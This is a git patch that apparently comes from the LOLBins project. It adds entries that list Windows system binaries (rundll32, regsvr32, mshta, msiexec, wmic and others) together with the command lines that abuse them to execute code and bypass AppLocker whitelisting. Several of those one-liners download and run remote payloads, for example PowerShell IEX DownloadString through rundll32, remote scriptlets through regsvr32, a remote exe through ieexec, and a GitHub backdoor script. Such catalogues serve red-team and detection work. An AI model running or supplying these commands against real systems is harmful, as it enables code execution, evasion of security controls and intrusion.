From 2803e540ace0a27bcef0b2a378bd41ea465955f4 Mon Sep 17 00:00:00 2001 From: api0cradle Date: Wed, 18 Apr 2018 13:17:49 +0200 Subject: [PATCH] Added some more --- LOLBins.md | 301 +++++++++++++++++++++++++++++++++++++++++++++++- RestList.txt | 318 +++++++++++++++++++++++++++++++++++++++++++++++++++ 2 files changed, 615 insertions(+), 4 deletions(-) create mode 100644 RestList.txt diff --git a/LOLBins.md b/LOLBins.md index 6ff63f8..1126fac 100644 --- a/LOLBins.md +++ b/LOLBins.md @@ -7,7 +7,7 @@ If you are missing from the acknowledgement, please let me know (I did not forge ## Rundll32.exe -* Functions: Execute code +* Functions: Execute ``` rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');" @@ -19,30 +19,323 @@ rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new% rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test") rundll32 shell32.dll,Control_RunDLL payload.dll + +rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1, + +rundll32.exe advpack.dll,RegisterOCX calc.exe + +rundll32.exe zipfldr.dll,RouteTheCall calc.exe + +rundll32.exe url.dll,OpenURL "C:\test\calc.hta" + +rundll32.exe url.dll,OpenURL "C:\test\calc.url" + +rundll32.exe url.dll, FileProtocolHandler calc.exe + +rundll32.exe ieframe.dll,OpenURL "C:\test\calc.url" + +rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.url" + +rundll32.exe ieadvpack.dll,LaunchINFSection test.inf,,1, ``` Acknowledgements: -* @subtee - +* Casey Smith - @subtee +* Jimmy - @bohops +* Moriarty - @Moriarty_Meng +* Adam - @hexacorn ## Regsvr32.exe + +* Functions: Execute ``` regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll ``` Acknowledgements: -* @subtee +* Casey Smith - @subtee ## Msbuild.exe + +* Functions: Execute ``` msbuild.exe pshell.xml ``` + +Acknowledgements: +* Casey Smith - @subtee + + + +## Regsvcs.exe + +* Functions: Execute + +``` +regsvcs.exe /U regsvcs.dll + +regsvcs.exe regsvcs.dll +``` + +Acknowledgements: +* Casey Smith - @subtee + + + +## Regasm.exe + +* Functions: Execute + +``` +regasm.exe /U regsvcs.dll + +regasm.exe regsvcs.dll +``` + +Acknowledgements: +* Casey Smith - @subtee + + + +## InstallUtil.exe + +* Functions: Execute + +``` +InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll +``` + +Acknowledgements: +* Casey Smith - @subtee + + + +## mshta.exe + +* Functions: Execute + +``` +mshta.exe evilfile.hta +``` + +Acknowledgements: +* ? + + + +## IEExec.exe + +* Functions: Execute + +``` +ieexec.exe http://x.x.x.x:8080/bypass.exe +``` + +Acknowledgements: +* ? + + + +## PresentationHost.exe + +* Functions: Execute + +``` +Presentationhost.exe C:\temp\Evil.xbap +``` + +Acknowledgements: +* Casey Smith - @subtee + + + +## Msiexec.exe + +* Functions: Execute + +``` +msiexec /quiet /i cmd.msi +msiexec /q /i http://192.168.100.3/tmp/cmd.png +``` + +Acknowledgements: +* Casey Smith - @subtee + + + +## CMSTP.exe + +* Functions: Execute + +``` +cmstp.exe /ni /s c:\cmstp\CorpVPN.inf +``` + +Acknowledgements: +* Oddvar Moe - @oddvarmoe +* Nick Tyrer - @NickTyrer + + + +## Xwizard.exe + +* Functions: DLL hijack + +``` +xwizard.exe (xwizard.dll in same folder) +``` + +Acknowledgements: +* Adam - @Hexacorn + + + +## odbcconf.exe + +* Functions: Execute + +``` +odbcconf -f file.rsp +``` Acknowledgements: * @subtee + + + +## Forfiles.exe + +* Functions: Execute + +``` +forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe +``` + +Acknowledgements: +* Eric - @vector_sec + + + +## SyncAppvPublishingServer.exe + +* Functions: Execute + +``` +SyncAppvPublishingServer.exe "n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX +``` + +Acknowledgements: +* Nick Landers - @monoxgas + + + +## InfDefaultInstall.exe + +* Functions: Execute + +``` +InfDefaultInstall.exe shady.inf +``` + +Acknowledgements: +* Kyle Hanslovan - @kylehanslovan + + + +## Atbroker.exe + +* Functions: Execute + +``` +ATBroker.exe /start malware +``` + +Acknowledgements: +* Adam - @hexacorn + + + +## WMIC.exe + +* Functions: Execute + +``` +wmic process call create calc + +wmic process get brief /format:"https://www.example.com/file.xsl + +wmic os get /format:"MYXSLFILE.xsl" + +wmic process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl" +``` + +Acknowledgements: +* Casey Smith - @subtee + + + +## Mavinject32.exe + +* Functions: Execute + +``` +MavInject32.exe /INJECTRUNNING + +MavInject32.exe 3110 /INJECTRUNNING c:\folder\evil.dll> +``` + +Acknowledgements: +* Giuseppe `N3mes1s` - @gN3mes1s +* Adam - @hexacorn + + + +## Runscripthelper.exe + +* Functions: Execute + +``` +runscripthelper.exe surfacecheck \\?\C:\Test\Microsoft\Diagnosis\scripts\test.txt C:\Test +``` + +Acknowledgements: +* Matt Graeber - @mattifestation + + + +## Control.exe + +* Functions: Execute + +``` +control.exe c:\windows\tasks\file.txt:evil.dll + +control.exe +(Add registry in HKCU\Software\Microsoft\Windows\currentversion\controlpanel\CPLS to manipulate) +``` + +Acknowledgements: +* Jimmy - @bohops + + + +## ie4unit.exe + +* Functions: Execute + +``` +ie4unit.exe -BaseSettings +(copy out ie4unit.exe and ieuinit.inf - add SCT in the MSIE4RegisterOCX.Windows7 section) +``` + +Acknowledgements: +* Jimmy - @bohops + + + diff --git a/RestList.txt b/RestList.txt new file mode 100644 index 0000000..ebc1937 --- /dev/null +++ b/RestList.txt @@ -0,0 +1,318 @@ +FORMAT: + +## Name.exe + +* Functions: + +``` +``` + +Acknowledgements: +* @subtee + + + +## MSDT.exe + +`Open .diagcab package` + +Notes: + +* Links: + * https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/ + * https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/ + + + +## dfsvc.exe + +Missing Example + +Notes: + +* Links: + * https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf + + + +## 32. Pubprn.vbs + +`pubprn.vbs 127.0.0.1 script:https://gist.githubusercontent.com/api0cradle/fb164762143b1ff4042d9c662171a568/raw/709aff66095b7f60e5d6f456a5e42021a95ca802/test.sct` + +* Requires admin: No +* Windows binary: Yes +* Bypasses AppLocker Default rules: ? + +Notes: + +* Links: + * https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology + * https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/ + + + +## 33. slmgr.vbs + +`slmgr.vbs` + +* Requires admin: No +* Windows binary: Yes +* Bypasses AppLocker Default rules: ? + +Notes: Requires registry keys for com object. + +* Links: + * https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology + * https://www.youtube.com/watch?v=3gz1QmiMhss + + + +## 34. winrm.vbs + +`winrm quickconfig` + +* Requires admin: No +* Windows binary: Yes +* Bypasses AppLocker Default rules: ? + +Notes: Requires registry keys for com object. + +* Links: + * https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology + * https://www.youtube.com/watch?v=3gz1QmiMhss + + + + + + + +## 43. CL_Invocation.ps1 + +`. C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1` +`SyncInvoke [args]` + +* Requires admin: No +* Windows binary: Yes +* Bypasses AppLocker Default rules: Yes, as long as PowerShell version 2 is present + +Notes: +Requires PowerShell version 2 + +* Links: + * https://twitter.com/bohops/status/948548812561436672 + + + +* Requires admin: No +* Windows binary: Yes +* Bypasses AppLocker Default rules: ? + +Notes: +Requires write access to a place that is allowed by AppLocker + +* Links: + * https://bohops.com/2018/01/23/loading-alternate-data-stream-ads-dll-cpl-binaries-to-bypass-applocker/ + * https://twitter.com/bohops/status/955659561008017409 + + + +## 55. Visual Studio Tools for Office - .VSTO files + +``` +evilfile.vsto +``` + +* Requires admin: No +* Windows binary: Yes +* Bypasses AppLocker Default rules: ? + +Notes: +You need to build a solution using Visual Studio Tools for Office. +User needs to confirm installation after executing. + +* Links: + * https://bohops.com/2018/01/31/vsto-the-payload-installer-that-probably-defeats-your-application-whitelisting-rules/ + + + + +## 56. Manage-bde.wsf + +``` +cscript c:\windows\system32\manage-bde.wsf +``` + +* Requires admin: No +* Windows binary: Yes +* Bypasses AppLocker Default rules: ? + +Notes: +Need to adjust comspec variable using: set comspec=c:\windows\system32\calc.exe + +* Links: + * https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712 + * https://twitter.com/bohops/status/980659399495741441 + + +# OTHER MICROSOFT SIGNED BINARIES + +## Bginfo.exe + +`bginfo.exe bginfo.bgi /popup /nolicprompt` + +* Requires admin: No +* Windows binary: No +* Bypasses AppLocker Default rules: No + +Notes: +Will work if BGinfo.exe is located in a path that is trusted by the policy. + +* Links: + * https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/ + * https://oddvar.moe/2017/05/22/clarification-bginfo-4-22-applocker-still-vulnerable/ + * https://pentestlab.blog/2017/06/05/applocker-bypass-bginfo/ + + + + +## 21. msxsl.exe + +`msxsl.exe customers.xml script.xsl` + +* Requires admin: No +* Windows binary: No +* Bypasses AppLocker Default rules: ? + +Notes: + +* Links: + * https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/ + * https://gist.github.com/subTee/d9380299ff35738723cb44f230ab39a1 + * https://github.com/3gstudent/Use-msxsl-to-bypass-AppLocker + * https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/ + +## 38. Winword.exe + +`winword.exe /l dllfile.dll` + +* Requires admin: No +* Windows binary: Yes +* Bypasses AppLocker Default rules: ? + +Notes: No commonly made DLL example file + +* Links: + * https://twitter.com/subTee/status/884615369511636992 + + +## 17. dnx.exe + +`dnx.exe consoleapp` + +* Requires admin: ? +* Windows binary: No +* Bypasses AppLocker Default rules: ? + +Notes: + +* Links: + * https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/ + + +## cdb.exe + +`cdb.exe -cf x64_calc.wds -o notepad.exe` + +* Requires admin: ? +* Windows binary: No +* Bypasses AppLocker Default rules: ? + +Notes: + +* Links: + * http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html + + + +## 18. rcsi.exe + +`rcsi.exe bypass.csx` + +* Requires admin: ? +* Windows binary: No +* Bypasses AppLocker Default rules: ? + +Notes: + +* Links: + * https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/ + + + +## 19. csi.exe + +Missing example + +* Requires admin: ? +* Windows binary: No +* Bypasses AppLocker Default rules: ? + +Notes: + +* Links: + * https://web.archive.org/web/20161008143428/ + * http://subt0x10.blogspot.com/2016/09/application-whitelisting-bypass-csiexe.html + + + +## 27. te.exe + +`te.exe bypass.wsc` + +* Requires admin: No +* Windows binary: No +* Bypasses AppLocker Default rules: ? + +Notes: Can be used if the Test Authoring and Execution Framework is installed and is in a path that is whitelisted. +Default location is: C:\program files (x86)\Windows Kits\10\testing\Runtimes\TAEF + +* Links: + * https://twitter.com/gN3mes1s/status/927680266390384640 + * https://gist.github.com/N3mes1s/5b75a4cd6aa4d41bb742acace2c8ab42 + + +## 25. fsi.exe + +`fsi.exe c:\folder\d.fscript` + +* Requires admin: No +* Windows binary: No +* Bypasses AppLocker Default rules: ? + +Notes: + +* Links: + * https://gist.github.com/NickTyrer/51eb8c774a909634fa69b4d06fc79ae1 + * https://twitter.com/NickTyrer/status/904273264385589248 + * https://docs.microsoft.com/en-us/dotnet/fsharp/tutorials/fsharp-interactive/ + + +## 40. Tracker.exe + +`Tracker.exe /d .\calc.dll /c C:\Windows\write.exe` + +* Requires admin: No +* Windows binary: No +* Bypasses AppLocker Default rules: ? + +Notes: +Part of Visual studio. +Requires TrackerUI.dll present in 1028 subfolder. + +* Links: + * https://twitter.com/Sudhanshu_C/status/943011972261412864 + + + +# OTHER NON-MICROSOFT BINARIES